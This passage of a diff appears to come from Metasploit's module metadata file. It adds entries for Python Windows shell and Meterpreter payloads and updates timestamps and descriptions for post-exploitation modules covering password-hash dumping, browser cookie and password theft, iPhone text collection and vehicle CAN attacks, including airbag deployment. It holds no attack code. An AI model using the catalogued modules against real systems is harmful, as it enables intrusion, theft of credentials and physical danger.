+      "Spencer McIntyre",
+      "OJ Reeves"
+    ],
+    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Connect back to the attacker with UUID Support",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/meterpreter/reverse_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/meterpreter_bind_tcp": {
+    "name": "Python Exec, Python Meterpreter Shell, Bind TCP Inline",
+    "fullname": "payload/cmd/windows/python/meterpreter_bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre"
+    ],
+    "description": "Execute a Python payload from a command. Connect to the victim and spawn a Meterpreter shell",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/meterpreter_bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/meterpreter_reverse_http": {
+    "name": "Python Exec, Python Meterpreter Shell, Reverse HTTP Inline",
+    "fullname": "payload/cmd/windows/python/meterpreter_reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre"
+    ],
+    "description": "Execute a Python payload from a command. Connect back to the attacker and spawn a Meterpreter shell",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/meterpreter_reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/meterpreter_reverse_https": {
+    "name": "Python Exec, Python Meterpreter Shell, Reverse HTTPS Inline",
+    "fullname": "payload/cmd/windows/python/meterpreter_reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre"
+    ],
+    "description": "Execute a Python payload from a command. Connect back to the attacker and spawn a Meterpreter shell",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/meterpreter_reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/meterpreter_reverse_tcp": {
+    "name": "Python Exec, Python Meterpreter Shell, Reverse TCP Inline",
+    "fullname": "payload/cmd/windows/python/meterpreter_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre"
+    ],
+    "description": "Execute a Python payload from a command. Connect back to the attacker and spawn a Meterpreter shell",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/meterpreter_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/pingback_bind_tcp": {
+    "name": "Python Exec, Python Pingback, Bind TCP (via python)",
+    "fullname": "payload/cmd/windows/python/pingback_bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "asoto-r7"
+    ],
+    "description": "Execute a Python payload from a command. Listens for a connection from the attacker, sends a UUID, then terminates",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/pingback_bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/pingback_reverse_tcp": {
+    "name": "Python Exec, Python Pingback, Reverse TCP (via python)",
+    "fullname": "payload/cmd/windows/python/pingback_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "asoto-r7"
+    ],
+    "description": "Execute a Python payload from a command. Connects back to the attacker, sends a UUID, then terminates",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/pingback_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/shell_bind_tcp": {
+    "name": "Python Exec, Command Shell, Bind TCP (via python)",
+    "fullname": "payload/cmd/windows/python/shell_bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "mumbai"
+    ],
+    "description": "Execute a Python payload from a command. Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/shell_bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/shell_reverse_tcp": {
+    "name": "Python Exec, Command Shell, Reverse TCP (via python)",
+    "fullname": "payload/cmd/windows/python/shell_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "Ben Campbell <eat_meatballs@hotmail.co.uk>"
+    ],
+    "description": "Execute a Python payload from a command. Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/shell_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/shell_reverse_tcp_ssl": {
+    "name": "Python Exec, Command Shell, Reverse TCP SSL (via python)",
+    "fullname": "payload/cmd/windows/python/shell_reverse_tcp_ssl",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "RageLtMan <rageltman@sempervictus>"
+    ],
+    "description": "Execute a Python payload from a command. Creates an interactive shell via Python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/shell_reverse_tcp_ssl",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/shell_reverse_udp": {
+    "name": "Python Exec, Command Shell, Reverse UDP (via python)",
+    "fullname": "payload/cmd/windows/python/shell_reverse_udp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "RageLtMan <rageltman@sempervictus>"
+    ],
+    "description": "Execute a Python payload from a command. Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/shell_reverse_udp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "payload_cmd/windows/reverse_lua": {
    "name": "Windows Command Shell, Reverse TCP (via Lua)",
    "fullname": "payload/cmd/windows/reverse_lua",
@@ -205304,7 +207659,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/aix/hashdump.rb",
    "is_install_path": true,
    "ref_name": "aix/hashdump",
@@ -205340,7 +207695,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-12-20 11:17:39 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/android/capture/screen.rb",
    "is_install_path": true,
    "ref_name": "android/capture/screen",
@@ -205368,7 +207723,7 @@
      "h00die",
      "timwr"
    ],
-    "description": "Post Module to dump the password hashes for Android System. Root is required.\n           To perform this operation, two things are needed.  First, a password.key file\n           is required as this contains the hash but no salt.  Next, a sqlite3 database\n           is needed (with supporting files) to pull the salt from.  Combined, this\n           creates the hash we need.  Samsung based devices change the hash slightly.",
+    "description": "Post Module to dump the password hashes for Android System. Root is required.\n            To perform this operation, two things are needed.  First, a password.key file\n            is required as this contains the hash but no salt.  Next, a sqlite3 database\n            is needed (with supporting files) to pull the salt from.  Combined, this\n            creates the hash we need.  Samsung based devices change the hash slightly.",
    "references": [
      "URL-https://www.pentestpartners.com/security-blog/cracking-android-passwords-a-how-to/",
      "URL-https://hashcat.net/forum/thread-2202.html"
@@ -205379,7 +207734,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-10-18 08:47:24 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/android/gather/hashdump.rb",
    "is_install_path": true,
    "ref_name": "android/gather/hashdump",
@@ -205416,7 +207771,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-10-01 16:54:46 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/android/gather/sub_info.rb",
    "is_install_path": true,
    "ref_name": "android/gather/sub_info",
@@ -205454,7 +207809,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-05-06 17:37:12 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/android/gather/wireless_ap.rb",
    "is_install_path": true,
    "ref_name": "android/gather/wireless_ap",
@@ -205493,7 +207848,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/post/android/local/koffee.rb",
    "is_install_path": true,
    "ref_name": "android/local/koffee",
@@ -205501,6 +207856,17 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "screen-effects",
+        "config-changes",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": [
      "meterpreter"
@@ -205532,7 +207898,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-09-08 21:56:02 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/android/manage/remove_lock.rb",
    "is_install_path": true,
    "ref_name": "android/manage/remove_lock",
@@ -205569,7 +207935,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/android/manage/remove_lock_root.rb",
    "is_install_path": true,
    "ref_name": "android/manage/remove_lock_root",
@@ -205606,7 +207972,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-09-08 21:56:02 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/apple_ios/gather/ios_image_gather.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/gather/ios_image_gather",
@@ -205632,7 +207998,7 @@
    "author": [
      "Shelby Pace"
    ],
-    "description": "This module collects text messages from iPhones.\n        Tested on iOS 10.3.3 on an iPhone 5.",
+    "description": "This module collects text messages from iPhones.\n          Tested on iOS 10.3.3 on an iPhone 5.",
    "references": [

    ],
@@ -205642,7 +208008,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-11-02 08:01:15 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/apple_ios/gather/ios_text_gather.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/gather/ios_text_gather",
@@ -205678,7 +208044,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-10-13 10:13:27 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/bsd/gather/hashdump.rb",
    "is_install_path": true,
    "ref_name": "bsd/gather/hashdump",
@@ -205715,7 +208081,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/firefox/gather/cookies.rb",
    "is_install_path": true,
    "ref_name": "firefox/gather/cookies",
@@ -205741,7 +208107,7 @@
    "author": [
      "joev <joev@metasploit.com>"
    ],
-    "description": "This module allows collection of the entire browser history from a Firefox\n        Privileged Javascript Shell.",
+    "description": "This module allows collection of the entire browser history from a Firefox\n          Privileged Javascript Shell.",
    "references": [

    ],
@@ -205751,7 +208117,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/firefox/gather/history.rb",
    "is_install_path": true,
    "ref_name": "firefox/gather/history",
@@ -205787,7 +208153,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/firefox/gather/passwords.rb",
    "is_install_path": true,
    "ref_name": "firefox/gather/passwords",
@@ -205813,7 +208179,7 @@
    "author": [
      "joev <joev@metasploit.com>"
    ],
-    "description": "This module runs the provided SCRIPT as javascript in the\n        origin of the provided URL. It works by navigating to a hidden\n        ChromeWindow to the URL, then injecting the SCRIPT with Function().\n        The callback \"send(result)\" is used to send data back to the listener.",
+    "description": "This module runs the provided SCRIPT as javascript in the\n          origin of the provided URL. It works by navigating to a hidden\n          ChromeWindow to the URL, then injecting the SCRIPT with Function().\n          The callback \"send(result)\" is used to send data back to the listener.",
    "references": [

    ],
@@ -205823,7 +208189,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/firefox/gather/xss.rb",
    "is_install_path": true,
    "ref_name": "firefox/gather/xss",
@@ -205859,7 +208225,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/firefox/manage/webcam_chat.rb",
    "is_install_path": true,
    "ref_name": "firefox/manage/webcam_chat",
@@ -205895,7 +208261,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-04-01 12:04:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/hardware/automotive/can_flood.rb",
    "is_install_path": true,
    "ref_name": "hardware/automotive/can_flood",
@@ -205921,7 +208287,7 @@
    "author": [
      "Craig Smith"
    ],
-    "description": "Scans between two CAN IDs and writes data at each byte position. It will\n                               either write a set byte value (Default 0xFF) or iterate through all possible values\n                               of that byte position (takes much longer). Does not check for responses and is\n                               basically a simple blind fuzzer.",
+    "description": "Scans between two CAN IDs and writes data at each byte position. It will\n          either write a set byte value (Default 0xFF) or iterate through all possible values\n          of that byte position (takes much longer). Does not check for responses and is\n          basically a simple blind fuzzer.",
    "references": [

    ],
@@ -205931,7 +208297,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/hardware/automotive/canprobe.rb",
    "is_install_path": true,
    "ref_name": "hardware/automotive/canprobe",
@@ -206047,7 +208413,7 @@
    "author": [
      "Craig Smith"
    ],
-    "description": "Post Module to query DTCs, Some common engine info and Vehicle Info.\n                               It returns such things as engine speed, coolant temp, Diagnostic\n                               Trouble Codes as well as All info stored by Mode $09 Vehicle Info, VIN, etc",
+    "description": "Post Module to query DTCs, Some common engine info and Vehicle Info.\n          It returns such things as engine speed, coolant temp, Diagnostic\n          Trouble Codes as well as All info stored by Mode $09 Vehicle Info, VIN, etc",
    "references": [

    ],
@@ -206057,7 +208423,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/hardware/automotive/getvinfo.rb",
    "is_install_path": true,
    "ref_name": "hardware/automotive/getvinfo",
@@ -206093,7 +208459,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/hardware/automotive/identifymodules.rb",
    "is_install_path": true,
    "ref_name": "hardware/automotive/identifymodules",
@@ -206129,7 +208495,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/hardware/automotive/malibu_overheat.rb",
    "is_install_path": true,
    "ref_name": "hardware/automotive/malibu_overheat",
@@ -206165,7 +208531,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-09-13 09:32:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/hardware/automotive/mazda_ic_mover.rb",
    "is_install_path": true,
    "ref_name": "hardware/automotive/mazda_ic_mover",
@@ -206193,7 +208559,7 @@
      "Juergen Duerrwang",
      "Craig Smith"
    ],
-    "description": "Acting in the role of a Pyrotechnical Device Deployment Tool (PDT), this module\n                               will first query all Pyrotechnic Control Units (PCUs) in the target vehicle\n                               to discover how many pyrotechnic devices are present, then attempt to validate\n                               the security access token using the default simplified algorithm.  On success,\n                               the vehicle will be in a state that is prepped to deploy its pyrotechnic devices\n                               (e.g. airbags, battery clamps, etc.) via the service routine. (ISO 26021)",
+    "description": "Acting in the role of a Pyrotechnical Device Deployment Tool (PDT), this module\n          will first query all Pyrotechnic Control Units (PCUs) in the target vehicle\n          to discover how many pyrotechnic devices are present, then attempt to validate\n          the security access token using the default simplified algorithm.  On success,\n          the vehicle will be in a state that is prepped to deploy its pyrotechnic devices\n          (e.g. airbags, battery clamps, etc.) via the service routine. (ISO 26021)",
    "references": [
      "CVE-2017-14937",
      "URL-https://www.researchgate.net/publication/321183727_Security_Evaluation_of_an_Airbag-ECU_by_Reusing_Threat_Modeling_Artefacts"
@@ -206204,7 +208570,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/hardware/automotive/pdt.rb",
    "is_install_path": true,
    "ref_name": "hardware/automotive/pdt",
@@ -206230,7 +208596,7 @@
    "author": [
      "Craig Smith"
    ],
-    "description": "Post Module for HWBridge RFTranscievers.  Brute forces AM OOK or raw\n                               binary signals.  This is a port of the rfpwnon tool by Corey Harding.\n                               (https://github.com/exploitagency/github-rfpwnon/blob/master/rfpwnon.py)",
+    "description": "Post Module for HWBridge RFTranscievers.  Brute forces AM OOK or raw\n          binary signals.  This is a port of the rfpwnon tool by Corey Harding.\n          (https://github.com/exploitagency/github-rfpwnon/blob/master/rfpwnon.py)",
    "references": [

    ],
@@ -206240,7 +208606,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/hardware/rftransceiver/rfpwnon.rb",
    "is_install_path": true,
    "ref_name": "hardware/rftransceiver/rfpwnon",
@@ -206266,7 +208632,7 @@
    "author": [
      "Craig Smith"
    ],
-    "description": "This module powers an HWBridge-connected radio transceiver,\n            effectively transmitting on the frequency set by the FREQ option.\n\n            NOTE: Users of this module should be aware of their local laws,\n            regulations, and licensing requirements for transmitting on any\n            given radio frequency.",
+    "description": "This module powers an HWBridge-connected radio transceiver,\n          effectively transmitting on the frequency set by the FREQ option.\n\n          NOTE: Users of this module should be aware of their local laws,\n          regulations, and licensing requirements for transmitting on any\n          given radio frequency.",
    "references": [
      "URL-https://github.com/AndrewMohawk/RfCatHelpers"
    ],
@@ -206276,7 +208642,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/hardware/rftransceiver/transmitter.rb",
    "is_install_path": true,
    "ref_name": "hardware/rftransceiver/transmitter",
@@ -206302,7 +208668,7 @@
    "author": [
      "Craig Smith"
    ],
-    "description": "Post Module to send beacon signals to the broadcast address while\n                               channel hopping",
+    "description": "Post Module to send beacon signals to the broadcast address while\n          channel hopping",
    "references": [

    ],
@@ -206312,7 +208678,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/hardware/zigbee/zstumbler.rb",
    "is_install_path": true,
    "ref_name": "hardware/zigbee/zstumbler",
@@ -206348,7 +208714,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/linux/busybox/enum_connections.rb",
    "is_install_path": true,
    "ref_name": "linux/busybox/enum_connections",
@@ -206384,7 +208750,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/linux/busybox/enum_hosts.rb",
    "is_install_path": true,
    "ref_name": "linux/busybox/enum_hosts",
@@ -206420,7 +208786,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-09-17 16:00:04 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/linux/busybox/jailbreak.rb",
    "is_install_path": true,
    "ref_name": "linux/busybox/jailbreak",
@@ -206456,7 +208822,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/linux/busybox/ping_net.rb",
    "is_install_path": true,
    "ref_name": "linux/busybox/ping_net",
@@ -206492,7 +208858,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/linux/busybox/set_dmz.rb",
    "is_install_path": true,
    "ref_name": "linux/busybox/set_dmz",
@@ -206528,7 +208894,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/linux/busybox/set_dns.rb",
    "is_install_path": true,
    "ref_name": "linux/busybox/set_dns",
@@ -206564,7 +208930,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/linux/busybox/smb_share_root.rb",
    "is_install_path": true,
    "ref_name": "linux/busybox/smb_share_root",
@@ -206600,7 +208966,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/linux/busybox/wget_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/busybox/wget_exec",
@@ -206627,7 +208993,7 @@
      "Christoph Sendner <christoph.sendner@stud-mail.uni-wuerzburg.de>",
      "Aleksandar Milenkoski <aleksandar.milenkoski@uni-wuerzburg.de>"
    ],
-    "description": "This module causes a hypervisor crash in Xen 4.2.0 when invoked from a\n        paravirtualized VM, including from dom0.  Successfully tested on Debian 7\n        3.2.0-4-amd64 with Xen 4.2.0.",
+    "description": "This module causes a hypervisor crash in Xen 4.2.0 when invoked from a\n          paravirtualized VM, including from dom0.  Successfully tested on Debian 7\n          3.2.0-4-amd64 with Xen 4.2.0.",
    "references": [
      "CVE-2012-5525"
    ],
@@ -206637,7 +209003,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-09-24 13:51:54 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/linux/dos/xen_420_dos.rb",
    "is_install_path": true,
    "ref_name": "linux/dos/xen_420_dos",
@@ -206673,7 +209039,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-08-06 00:46:09 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/linux/gather/checkcontainer.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/checkcontainer",
@@ -206710,7 +209076,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-05-23 13:16:22 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/linux/gather/checkvm.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/checkvm",
@@ -206737,7 +209103,7 @@
    "author": [
      "Dhiru Kholia <dhiru@openwall.com>"
    ],
-    "description": "This module will collect the contents of all users' .ecrypts directories on\n        the targeted machine. Collected \"wrapped-passphrase\" files can be\n        cracked with John the Ripper (JtR) to recover \"mount passphrases\".",
+    "description": "This module will collect the contents of all users' .ecrypts directories on\n          the targeted machine. Collected \"wrapped-passphrase\" files can be\n          cracked with John the Ripper (JtR) to recover \"mount passphrases\".",
    "references": [

    ],
@@ -206747,7 +209113,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/linux/gather/ecryptfs_creds.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/ecryptfs_creds",
@@ -206819,7 +209185,7 @@
    "author": [
      "ohdae <bindshell@live.com>"
    ],
